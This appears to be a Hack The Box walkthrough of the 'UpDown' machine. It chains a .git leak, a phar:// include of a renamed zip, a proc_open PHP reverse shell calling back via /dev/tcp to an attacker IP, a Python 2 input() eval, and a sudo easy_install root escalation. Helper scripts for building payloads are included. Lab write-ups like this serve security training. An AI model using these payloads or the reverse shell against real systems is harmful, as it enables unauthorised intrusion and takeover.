UpDown - Hack The Box
Enumeration
Nmap
The initial Nmap scan showed SSH and HTTP open.
Web Enumeration
The website referenced the domain siteisup.htb, so I added it to /etc/hosts.
Directory Brute Forcing
Directory brute forcing with a common wordlist found a /dev directory, and inside it an exposed .git directory.
Git Dumper
I used git-dumper to dump the repository through the publicly accessible .git directory.
It contained the PHP files of the dev site and an .htaccess file. An .htaccess file is an Apache per-directory configuration file, not a PHP one, and it is exactly where access restrictions like this one end up.
Reading it showed that requests to the dev site must carry a Special-Dev header; without that header Apache denies access.
Subdomain Brute Force
After analyzing the files from the dev site, I ran subdomain enumeration to find the virtual host the dev site is served from. As expected it returned the dev subdomain.
Burp Update
Then I opened Burp Suite and added a match-and-replace rule that inserts the Special-Dev header into every request.
Analyzing Dev Website
First I looked at index.php. It takes a page parameter, appends .php to it and includes the result; if no parameter is given it includes checker.php.
Then I analyzed checker.php. It takes an uploaded file (a list of sites to check), rejects files whose extension is on a blocklist of known dangerous extensions, creates a directory under uploads/ named after the MD5 of the current timestamp, stores the file there, reads it line by line checking whether each site is up, and then deletes the file.
The blocklist covers the usual PHP extensions, but it does not cover what the phar:// stream wrapper will open. phar:// is PHP's archive wrapper: it reads phar, tar and zip archives by content, not by file extension, so a file inside a zip archive can be included as phar:///path/to/archive.ext/file.php no matter what the archive is called (for example: include 'phar:///path/to/file.zip/file.php';). Since .zip and the other obvious archive extensions are blocked, I put a phpinfo() file into a zip archive and named the archive with the unlisted .mto extension.
Because index.php includes whatever the page parameter names (with .php appended by index.php itself), requesting it with a phar:// path into the uploaded archive rendered the phpinfo() page.
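The archive-building step above, as an added example (my code, not the writeup's or the box's): it shows why the extension blocklist does not matter to phar://, and how the page parameter has to be formed when index.php appends .php itself. Assumptions, labelled in the code: the upload root (/var/www/dev/uploads) is not stated on the page; the directory name is taken to be md5 of the Unix timestamp in decimal seconds, which is how I read "MD5 of timestamp"; the blocklist contents are constructed for illustration.

```python
"""Build the zip-with-unlisted-extension payload for the phar:// include.

Added example, not the original writeup's code. Assumptions: upload root
/var/www/dev/uploads (not on the page), directory name = md5 of the decimal
Unix timestamp, and a constructed extension blocklist.
"""
import hashlib
import io
import zipfile

# Constructed blocklist for illustration; the real checker.php list is not
# reproduced on the page. Note the gap: .mto is not here, but phar:// does
# not care what the archive is called.
BLOCKED_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar", "zip", "tar", "gz"}


def extension_is_blocked(filename: str) -> bool:
    """Mimic a naive extension blocklist: only the final extension is checked."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in BLOCKED_EXTENSIONS


def build_archive(inner_name: str, php_source: str) -> bytes:
    """Return an in-memory zip archive holding inner_name with php_source.
    Stored (uncompressed) entries keep the archive as plain as possible; the
    phar:// wrapper identifies the archive by its zip structure, not its name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr(inner_name, php_source)
    return buf.getvalue()


def archive_members(archive: bytes) -> dict:
    """Read back every member of an archive (used to verify what was built)."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def upload_dir_name(unix_ts: int) -> str:
    """checker.php names the directory after the MD5 of the timestamp (per the
    writeup); assumed here to be md5 of the decimal seconds string."""
    return hashlib.md5(str(unix_ts).encode()).hexdigest()


def page_param(upload_root: str, unix_ts: int, archive_name: str, inner_name: str) -> str:
    """Value for index.php?page=... . index.php appends '.php' itself, so the
    inner file name is passed without its .php suffix."""
    if not inner_name.endswith(".php"):
        raise ValueError("inner file must end in .php for index.php's include to hit it")
    stem = inner_name[: -len(".php")]
    return f"phar://{upload_root}/{upload_dir_name(unix_ts)}/{archive_name}/{stem}"


if __name__ == "__main__":
    payload = build_archive("info.php", "<?php phpinfo(); ?>")
    with open("payload.mto", "wb") as f:
        f.write(payload)
    # Timestamp is whatever second the upload lands in; 1660000000 is a placeholder.
    print(page_param("/var/www/dev/uploads", 1660000000, "payload.mto", "info.php"))
```

The directory name depends on the second the upload is processed, so in practice the timestamp is read from the response or guessed within a small window; that is outside what this helper does.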
I tried a few reverse shells and none of them worked. The phpinfo page showed why: disable_functions blocks the usual command-execution functions. I could go through the list manually, or run the dfunc-bypasser script, which compares it against the known command-execution functions and reports any that are not disabled.
First I had to modify dfunc-bypasser so that its requests carry the Special-Dev header.
Running it reported that proc_open is not disabled. proc_open spawns a process from a command string, so it runs shell commands just like exec() or system() would; see the PHP documentation for the details.
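The check dfunc-bypasser automates, as an added example (my code, not the tool's): pull the disable_functions value out of a phpinfo() page and diff it against the process-spawning functions. The phpinfo HTML snippet and the disable_functions value below are constructed for illustration and are not the ones from the box; the function list is the well-known set of direct command-execution primitives.

```python
"""Find command-execution functions missing from disable_functions.

Added example, not dfunc-bypasser's code. SAMPLE_* values are constructed
for illustration, not copied from the box.
"""
import re

# Functions that directly spawn a process or run a command.
EXEC_FUNCTIONS = ["exec", "passthru", "shell_exec", "system", "popen", "proc_open", "pcntl_exec"]

# Constructed: a list that blocks the usual suspects but forgets proc_open.
SAMPLE_DISABLE_FUNCTIONS = "pcntl_alarm, pcntl_fork, exec, passthru, shell_exec, system, popen, pcntl_exec"

# Constructed: the shape phpinfo() uses for a directive row
# (<td class="e"> = name, first <td class="v"> = local value).
SAMPLE_PHPINFO = (
    '<tr><td class="e">disable_functions</td>'
    '<td class="v">exec,system</td><td class="v">exec,system</td></tr>'
)


def parse_disable_functions(value: str) -> set:
    """disable_functions is a comma-separated list; whitespace and case vary."""
    return {f.strip().lower() for f in value.split(",") if f.strip()}


def allowed_exec_functions(disable_functions: str) -> list:
    """Return every EXEC_FUNCTIONS entry that is NOT disabled, in list order."""
    disabled = parse_disable_functions(disable_functions)
    return [f for f in EXEC_FUNCTIONS if f not in disabled]


def extract_disable_functions(phpinfo_html: str) -> str:
    """Pull the local value of disable_functions out of phpinfo() HTML.
    An empty setting is rendered as <i>no value</i>, which maps to ''."""
    m = re.search(r'disable_functions</td>\s*<td class="v">(.*?)</td>', phpinfo_html, re.S)
    if not m:
        return ""
    value = re.sub(r"<[^>]+>", "", m.group(1)).replace("&nbsp;", "").strip()
    return "" if value == "no value" else value


if __name__ == "__main__":
    print("allowed:", allowed_exec_functions(SAMPLE_DISABLE_FUNCTIONS))
    print("from html:", allowed_exec_functions(extract_disable_functions(SAMPLE_PHPINFO)))
```

Fetching the phpinfo page is the part that needs the Special-Dev header; everything after that is string processing, which is why the tool only needed a one-line change.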
Exploitation
Creating proc_open reverse shell
With proc_open available, I wrote the reverse shell script below:
<?php
// proc_open() requires a descriptor spec even though the pipes are never read:
// the inner bash redirects its own stdin/stdout/stderr to the TCP socket.
$descspec = array(
  0 => array("pipe", "r"),   // child stdin
  1 => array("pipe", "w"),   // child stdout
  2 => array("pipe", "w")    // child stderr
);
// Interactive bash that connects back to the attacker (10.10.16.12:1234) over /dev/tcp.
$cmd = "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.16.12/1234 0>&1'";
$proc = proc_open($cmd, $descspec, $pipes);
?>
Uploading and Getting Reverse Shell
I zipped the shell into an archive with the .mto extension and uploaded it through checker.php.
Including it through the phar:// path while listening with netcat gave me a reverse shell as www-data.
Python2 Code Execution
As www-data I could not read user.txt in the developer's home directory. The usual privilege-escalation checks turned up nothing, but there was a dev folder inside the home directory containing a Python 2 script that reads input from the user and a binary that runs that script as the developer user.
In Python 2, input() is equivalent to eval(raw_input()): whatever is typed is evaluated as a Python expression, so it can import os and run shell commands. To test it I ran id; the output showed developer's uid but a group id of www-data.
Then I simply spawned /bin/bash and got a shell as developer.
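The Python 2 input() problem, as an added example (my code, not the box's script): Python 2's input() is eval(raw_input()), reproduced here in Python 3 so the behaviour can be seen next to the fix. The payload string used on the box is not on the page, so the one below is illustrative; it calls getpid() rather than spawning a process so the example stays harmless.

```python
"""Python 2 input() semantics next to the safe replacement.

Added example, not the box's script. py2_input() deliberately reproduces the
Python 2 bug (eval of the raw line) in Python 3.
"""
import ast


def py2_input(line: str):
    """Python 2 input(): the line is parsed and evaluated as an expression.
    A line such as __import__('os').system('id') executes a command under the
    uid the script runs as, which is the whole privilege escalation."""
    return eval(line)  # deliberately unsafe: this IS the vulnerability


def safe_input(line: str):
    """Accept only Python literals (numbers, strings, tuples, lists, dicts);
    calls, attribute access and names raise ValueError instead of running."""
    return ast.literal_eval(line)


def is_code_injection(line: str) -> bool:
    """Static check: does the line contain anything beyond a literal?"""
    try:
        ast.literal_eval(line)
        return False
    except (ValueError, SyntaxError, TypeError, MemoryError, RecursionError):
        return True


if __name__ == "__main__":
    # Illustrative payload: same shape as a command-execution payload, harmless.
    print(py2_input("__import__('os').getpid()"))
    print(is_code_injection("__import__('os').system('id')"))
```

raw_input() in Python 2 (input() in Python 3) returns the line as a string without evaluating it; a script that needs a number should call int() on that string rather than rely on input() to parse it.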
SSH
But I still could not read user.txt: my group was still www-data, and user.txt is owned by root with read access granted to the developer group.
So I copied developer's ~/.ssh/id_rsa and used it to log in over SSH as the developer user, which gives a session with the right group.
Logging in that way worked and user.txt was readable.
Privilege Escalation
sudo -l
Running sudo -l revealed that I can run easy_install as root. easy_install is the deprecated setuptools installer: given a package name or a path, it builds and installs it, which means it executes that package's setup.py.
GTFOBins
After some research I found that GTFOBins has an entry for easy_install: point it at a directory whose setup.py spawns a shell, and because the installer executes setup.py under sudo, that shell runs as root. I applied those steps and got a root shell.
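The fake package that the GTFOBins easy_install recipe relies on, as an added example (my code, not the writeup's commands or GTFOBins' text): the directory holds a setup.py whose only job is to replace the installer process with a shell, so running sudo easy_install on that directory yields a root shell. The tty redirection keeps the shell interactive when easy_install captures stdout. Running this requires the sudo rule from the page; the helper itself only writes the directory.

```python
"""Build the package directory for the easy_install sudo escalation.

Added example, not the writeup's commands. Assumes the sudo rule the page
reports (easy_install runnable as root) and a POSIX /bin/sh.
"""
import os
import tempfile

# setup.py body: easy_install executes it, so exec a shell in its place.
# The $(tty) redirections keep stdin/stdout attached to the terminal.
SETUP_PY = (
    "import os\n"
    "os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\n"
)


def write_fake_package(base_dir=None) -> str:
    """Create a temporary directory containing only setup.py and return its path."""
    pkg_dir = tempfile.mkdtemp(dir=base_dir)
    with open(os.path.join(pkg_dir, "setup.py"), "w") as f:
        f.write(SETUP_PY)
    return pkg_dir


def sudo_command(pkg_dir: str) -> str:
    """The command to run on the target; easy_install treats a path as a source package."""
    return f"sudo easy_install {pkg_dir}"


if __name__ == "__main__":
    d = write_fake_package()
    print("run this on the target:", sudo_command(d))
```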
Pwned
The machine was fully compromised.